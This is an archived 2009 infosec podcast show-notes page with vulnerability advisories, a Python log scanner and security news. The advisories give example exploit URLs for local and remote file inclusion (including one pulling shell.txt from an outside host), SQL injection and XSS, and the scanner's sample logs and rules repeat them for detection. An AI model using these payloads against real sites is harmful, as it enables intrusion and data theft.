Your daily source of Pwnage, Policy and Politics.


Episode 37 – Year End


InfoSec Podcast Episode 37 for December 30, 2009. This podcast is our contribution back to the community: we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Sponsors: This podcast is sponsored in part by Webspeedway, your Virtual IT Department. When your systems are down, the resulting downtime can have a devastating impact on a small or medium-sized business.

Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.

Go to www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10

Go online to register by going to http://www.sans.org/atlanta-cs-events-2010/?utm_source=web-sans&utm_medium=banner&utm_content=Featured_Community_SANS_atlanta-2010-cs_events&utm_campaign=Community_SANS_Atlanta_2010&ref=52093

or call (301) 654-SANS(7267).

Vulnerabilities of Interest:

  1. RoseOnlineCMS is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input which could be exploited to obtain potentially sensitive information or to execute local scripts. RoseOnlineCMS 3 B1 is vulnerable; other versions may also be affected. Example URL: http://www.example.com/modules/admincp.php?admin=[LFI%00]
  2. phpAuction is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. This could lead to execution of script code in the browser of an unsuspecting user in the context of the affected site, which may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Example URLs: http://www.example.com/phpauction/register.php?TPL_name=1>”><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&TPL_nick=indoushka&[email protected]&[email protected]&[email protected] and http://www.example.com/phpauction/register.php?TPL_name=indoushka&TPL_nick=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(213771818860)%3B%3C/ScRiPt%3E&[email protected]&[email protected]&[email protected]&TP
  3. The ‘com_adagency’ component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input which could allow an attacker to potentially obtain sensitive information and execute local scripts in the context of the webserver process. Example URL: http://www.example.com/index.php?option=com_adagency&controller= [-LFI-]
  4. The Memory Book component for Joomla! is subject to an SQL-injection vulnerability and an arbitrary-file-upload vulnerability which could allow an attacker to compromise the application, upload files, execute code, access or modify data, or exploit other vulnerabilities in the underlying database. Memory Book 1.2 is vulnerable; other versions may also be affected. All you need is a browser to exploit this vulnerability.
  5. DrBenHur.com DBHcms is subject to a remote file-include vulnerability because it fails to properly sanitize user-supplied input, which could allow an attacker to include a file containing malicious PHP code and execute it in the context of the webserver process. This may lead to a compromise of the application and the underlying system; other attacks are also possible. DBHcms 1.1.4 is vulnerable; other versions may also be affected. Example URL: http://www.example.com/index.php?dbhcms_core_dir=http://www.example.org/shell.txt%00
  6. UPDATE: The previously reported Microsoft IIS security-bypass vulnerability could cause IIS to interpret unexpected files as CGI applications. For an exploit to succeed, IIS must be configured in a non-default way, contrary to the vendor’s recommended best practices.
  7. The Q-Personel component for Joomla! is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input which could be leveraged to execute script code in the browser of an unsuspecting user. Q-Personel 1.0.2(RC2) is vulnerable; other versions may be affected as well. Example URL: http://www.example.com/j15x/index.php?option=com_qpersonel&task=sirala&personel_sira=[XSS CODE]
  8. Stash is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data, which could be leveraged to execute script code in the browser of an unsuspecting user. Stash 1.0.3 is vulnerable; other versions may also be affected. To exploit these issues, an attacker must get the victim to follow a malicious URL.
  9. Calendar Express is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query which could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Example URL: http://www.example.com/calendarexpress2.1/year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+usi
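The advisories above share four request-level patterns: directory traversal or a %00 terminator in a file parameter (LFI), a remote URL in a file parameter (RFI), a UNION SELECT in a numeric parameter (SQL injection), and a script tag in a reflected field (XSS). The Python below is an example added here, not code from the podcast or from any of the affected projects; it runs a small classifier over web-server access-log lines. The log lines are constructed for the example, modelled on the example URLs above, and the rules are illustrative patterns rather than a complete signature set.

```python
"""Classify access-log requests for the LFI / RFI / SQLi / XSS patterns
seen in the advisories. Added example; log lines below are constructed."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache "combined" format lines, modelled on the example URLs
# in the advisories (not real traffic).
SAMPLE_LOG = """
203.0.113.5 - - [30/Dec/2009:10:01:02 -0500] "GET /modules/admincp.php?admin=../../../../etc/passwd%00 HTTP/1.1" 200 512
203.0.113.5 - - [30/Dec/2009:10:01:09 -0500] "GET /index.php?dbhcms_core_dir=http://www.example.org/shell.txt%00 HTTP/1.1" 200 1024
203.0.113.7 - - [30/Dec/2009:10:02:11 -0500] "GET /phpauction/register.php?TPL_name=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(1)%3B%3C/ScRiPt%3E HTTP/1.1" 200 2048
203.0.113.9 - - [30/Dec/2009:10:03:30 -0500] "GET /calendarexpress2.1/year.php?catid=-4+union+select+0,concat(USER(),0x3a,VERSION()) HTTP/1.1" 200 3072
198.51.100.2 - - [30/Dec/2009:10:04:00 -0500] "GET /index.php?option=com_qpersonel&task=sirala&personel_sira=3 HTTP/1.1" 200 4096
"""

# Only the fields of the combined log format that we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Ordered rules: the first match wins for a given parameter value. RFI is
# checked before LFI because the DBHcms-style URL carries both a remote
# URL and the %00 terminator (PHP before 5.3.4 truncated file paths at a
# NUL byte, which is why %00 appears in these example URLs).
RULES = [
    ("RFI", re.compile(r'^\s*(?:https?|ftp)://', re.I)),          # value is itself a URL
    ("LFI", re.compile(r'\.\.[/\\]|\x00')),                          # traversal or NUL byte
    ("SQLI", re.compile(r'\bunion\b.*?\bselect\b|\bconcat\s*\(', re.I | re.S)),
    ("XSS", re.compile(r'<\s*script\b|javascript\s*:|\bon\w+\s*=', re.I)),
]


def classify_request(url):
    """Return [(tag, parameter_name), ...] for one request-target string."""
    findings = []
    # parse_qsl percent-decodes values (so %00 becomes a NUL byte and %3C a '<')
    # and turns '+' into a space, which is how the application would see them.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for tag, pattern in RULES:
            if pattern.search(value):
                findings.append((tag, name))
                break
    return findings


def scan_log(text):
    """Parse combined-format lines and attach findings to each request."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # blank or malformed line
        events.append({
            "ip": m.group("ip"),
            "path": urlsplit(m.group("url")).path,
            "status": int(m.group("status")),
            "findings": classify_request(m.group("url")),
        })
    return events


if __name__ == "__main__":
    for ev in scan_log(SAMPLE_LOG):
        if ev["findings"]:
            print(f'{ev["ip"]} {ev["path"]} -> {ev["findings"]}')
```

Running the block flags the first four constructed requests as LFI, RFI, XSS and SQLI respectively and leaves the ordinary Joomla request alone. The decoding step matters: the phpAuction payload only reveals its script tag after percent-decoding, and the Calendar Express payload only reads as "union select" once the '+' signs become spaces. A production detector would also normalise double-encoded input and look at POST bodies and headers, which this single-decode, query-string-only example does not.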

News Items of Interest:
According to Adult Protective Services workers, reports of financial scams targeting elderly victims have steadily increased in this tough economy. They have some recommendations for those with elderly family members. First, they recommend that you really listen to elderly relatives when they talk about their lives. Are they mentioning new friends, people soliciting money at the front door for charities, or repairmen you’ve never heard of before? Is there talk of a new will? Has your loved one given money to someone recently? Is the phone jangling constantly with calls from telemarketing companies?

Take a good look around the house. Is there food in the refrigerator? Is the cupboard well-stocked with food that hasn’t expired? Do labels indicate that medications have been prescribed by one doctor, or many? Are medications being taken properly?

Seniors who have recently lost a spouse, close friend or child are particularly likely to isolate themselves, often leading to a spiral of depression, and they can be especially vulnerable to crooks.

It’s not enough that your elderly loved one still goes to the supermarket and drives a car: their executive function, or higher level of reasoning, can deteriorate with age.

If your older relatives use the Internet, make sure they’re not sitting ducks for cyber crime. Have they installed firewalls on their computers? Are their passwords easily hacked? Have they taken a computer security class?

News item 2: http://shmooslugs.pbworks.com/

Robert Fuller has a site for ShmooCon Slugs to help people get together for rides to ShmooCon 2010. If you’re not familiar with what slugging is, the site references the Wikipedia entry, which states: “Slugging, also known as casual carpooling, is the practice of forming ad hoc, informal carpools for purposes of commuting, essentially a variation of ride-share commuting and hitchhiking. While the practice is most common and most publicized in the congested Washington, D.C. area (where it is primarily used by commuters who live in Northern Virginia), slugging is also used in San Francisco, Pittsburgh, and other U.S. cities. Sluggers gather at local businesses and at government-run locations, albeit not always with official sanction.”

News item 3:http://lists.shmoo.com/mailman/listinfo/shmoocon-roommates

There is also a mailing list for ShmooCon attendees looking for roommates. ShmooCon is not responsible for actions based on/around/near or anywhere near related to ShmooCon Roommates. Use at your own risk!

News item 4: http://reflextor.com/trac/a51
http://www.nytimes.com/2009/12/29/technology/29hack.html?_r=1&ref=technology
http://www.theregister.co.uk/2009/12/28/gsm_eavesdropping_breakthrough/
http://news.cnet.com/8301-1009_3-10422340-83.html?part=rss&subj=news&tag=2547-1_3-0-20

Computerworld has an interesting article on how simple it is for hackers to snoop on GSM cellular calls encrypted with the 64-bit A5/1 cipher. At the Chaos Communication Congress in Berlin, researcher Karsten Nohl said that he had compiled 2 terabytes worth of data: cracking tables that can be used as a kind of reverse phone book to determine the encryption key used to secure a GSM (Global System for Mobile communications) telephone conversation or text message. While Nohl stopped short of releasing a GSM-cracking device, which would be illegal in many countries, including the U.S., he said he divulged information that has been common knowledge in academic circles and made it “practically useable.”

According to Nohl, using his tables, antennas, specialized software, and $30,000 worth of computing hardware to break the cipher, someone can crack the GSM encryption in real time and listen in on calls. Let’s put this into perspective: there are about 3.5 billion GSM phones worldwide, making up about 80 percent of the mobile market, according to data from the GSM Alliance.

News item 5: http://www.nytimes.com/2009/12/26/opinion/26sat2.html?_r=2&adxnnl=1&adxnnlx=1261810873-sVGmBHkWduJvGowqvAkrFA

The Ohio Supreme Court has struck an important blow for privacy rights, ruling that the police need a warrant to search a cellphone. The court rightly recognized that cellphones today are a lot more than just telephones, that they hold a wealth of personal information and that the privacy interest in them is considerable. This was the first such ruling from a state supreme court. It is a model for other courts to follow.

The Ohio Supreme Court ruled this month, by a 4-to-3 vote, that the search violated the Fourth Amendment’s protection against unreasonable search and seizure. Rather than seeing a cellphone as a simple closed container, the majority noted that modern cellphones — especially ones that permit Internet access — are “capable of storing a wealth of digitized information.”

News item 6:http://www.wired.com/threatlevel/2009/12/montgomery-2
http://www.theregister.co.uk/2009/12/24/cia_montgomery/
A self-proclaimed software programmer who convinced the CIA that he had developed software capable of deciphering hidden messages in Al Jazeera broadcasts appears to have been responsible for an elevation in the national security level in late 2003, causing the grounding of international flights and the evacuation of the Metropolitan Museum of Art. Dennis Montgomery managed to convince a CIA Directorate of Science and Technology employee that his technology and the information it generated were credible. The information was passed to top government officials. Only later did it become evident that Montgomery had not shared his algorithms with anybody in the Government, nor was anyone in the government clear about how the information was obtained. Montgomery also reportedly received a no-bid US $30 million contract for “compression” and “automatic target recognition” technology that he claimed could analyze surveillance video from drones and identify weapons in people’s hands. A man who used to work with Montgomery says he helped fake about 40 demonstrations of the software.

News item 7: http://www.msnbc.msn.com/id/34611083/ns/technology_and_science-tech_and_gadgets/
Two New Jersey state legislators are sponsoring a bill that would impose hefty fines on people and/or organizations that send unsolicited text messages. Of particular concern to Sens. Joseph Vitale and Sean Kean are messages sent to the elderly and disabled and messages that cause people to exceed their monthly text message allotment, incurring additional costs from their providers. An unsolicited ad is defined as one that is sent without prior consent of the recipient that urges the recipient to rent or purchase services or merchandise. First time offenders would be fined up to US $10,000 and repeat offenders fined up to US $20,000. If the violator knew or should have known that the recipient was an elderly or disabled person, the maximum fine increases to US $30,000.

News item 8: http://www.theregister.co.uk/2009/12/24/ddos_attack_ultradns_december_09/
http://www.computerworld.com/s/article/9142681/DDoS_attack_on_DNS_hits_Amazon_and_others_briefly?source=rss_security
http://www.cnn.com/2009/TECH/12/24/cnet.ddos.attack/index.html
http://www.informationweek.com/news/storage/security/showArticle.jhtml?articleID=222100146
A distributed denial-of-service (DDoS) attack against the DNS provider for Amazon, Wal-Mart, the Gap and other shopping websites made those sites temporarily unavailable. The attack, launched against Neustar on December 23, affected users in Northern California. The attack kept the sites unavailable for about an hour, and last-minute holiday shoppers experienced frustrating delays. An UltraDNS spokesperson said that “queries may have taken some time to resolve and some may not have been completed, but there never was an outage.”

News item 9: http://www.washingtonpost.com/wp-dyn/content/article/2009/12/23/AR2009122302970_pf.html
A report from the Government Accountability Office (GAO) faults five government agencies, two congressional offices and the National Security Council for the leak of information about hundreds of US civilian nuclear facilities. The document was published on the Government Printing Office website in June and remained visible for about one day. The document was intended for the International Atomic Energy Agency (IAEA). Some of the confusion stemmed from the document’s classification with an IAEA term that is not recognized in the US. NSC did not provide specific instructions for handling the document once delivered to the White House clerk’s office.

News item 10: http://abcnews.go.com/Business/wireStory?id=9418695
A US federal judge has granted preliminary approval to a proposed settlement that would have Countrywide Financial Corp. provide free credit monitoring to as many as 17 million people whose personal information was compromised. The settlement also provides up to US $50,000 in reimbursement for each instance of identity fraud that can be traced to the breach and for which the victims were not reimbursed otherwise and in which they lost something of value. The suit has its origins in data theft committed by former Countrywide analyst Rene Rebollo Jr., who downloaded thousands of customers’ information every week for two years and sold it to Wahid Siddiqi. Siddiqi pleaded guilty to fraud earlier this month; Rebollo’s trial is scheduled to begin in January.

News item 11: http://www.theregister.co.uk/2009/12/24/inmate_prison_hack/
http://www.computerworld.com/s/article/9142628/Inmate_gets_18_months_for_hacking_prison_computer
Francis G. Janosko has been sentenced to 18 months in prison for breaking into the Plymouth (Massachusetts) County Correctional Facility’s computer network, accessing information about more than 1,100 prison employees and making that information available to other inmates. Janosko pleaded guilty to damaging a protected computer in September. Janosko, who was an inmate at the time on unrelated charges, was using a machine that was supposed to be configured to allow access only to a legal research program, but he managed to exploit a vulnerability that allowed him access to the Internet and to the prison network.

News item 12: http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=222003024&subSection=Attacks/breaches
http://www.scmagazineus.com/citibank-refutes-reported-hack-by-russian-gang/article/160124/
http://news.cnet.com/8301-1009_3-10420308-83.html
http://www.cbsnews.com/stories/2009/12/23/eveningnews/main6016135.shtml
http://online.wsj.com/article/SB126145280820801177.html?mod=rss_Today%27s_Most_Popular
While the FBI says it is investigating losses totaling tens of millions of dollars from Citibank accounts, Citibank parent company Citigroup denies reports that it has fallen prey to a cyber attack or that an investigation is underway. Citigroup did acknowledge that its systems have been probed but persisted in denying that an attack occurred and that money was stolen from customer accounts. The cyber thieves allegedly used the Black Energy botnet in their attacks. Sources have suggested that the Russian Business Network, a notorious cybercrime network, is behind the cyber heists. There is a report of one man being blocked from accessing his company’s Citibank account; although he alerted the bank immediately, a day later more than US $1 million had been withdrawn without his authorization. About 80 percent of the funds were recovered, and Citibank covered the man’s losses for the rest.

News item 13:http://www.scmagazineuk.com/mbna-confirms-data-loss-after-laptop-containing-personal-details-of-thousands-of-customers-was-stolen-from-vendor/article/160217/
http://www.net-security.org/secworld.php?id=8656
http://www.lep.co.uk/news/Customer-credit-card-details-stolen.5929370.jp
MBNA is notifying thousands of customers that a laptop stolen from NCO Europe offices contains their credit card information. NCO Europe is a third-party contractor. Although the files do contain personal information, no PINs are believed to be included. While no fraudulent activity has been detected on the compromised accounts, MBNA is offering affected customers one year of credit monitoring service and is monitoring all compromised accounts.

All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.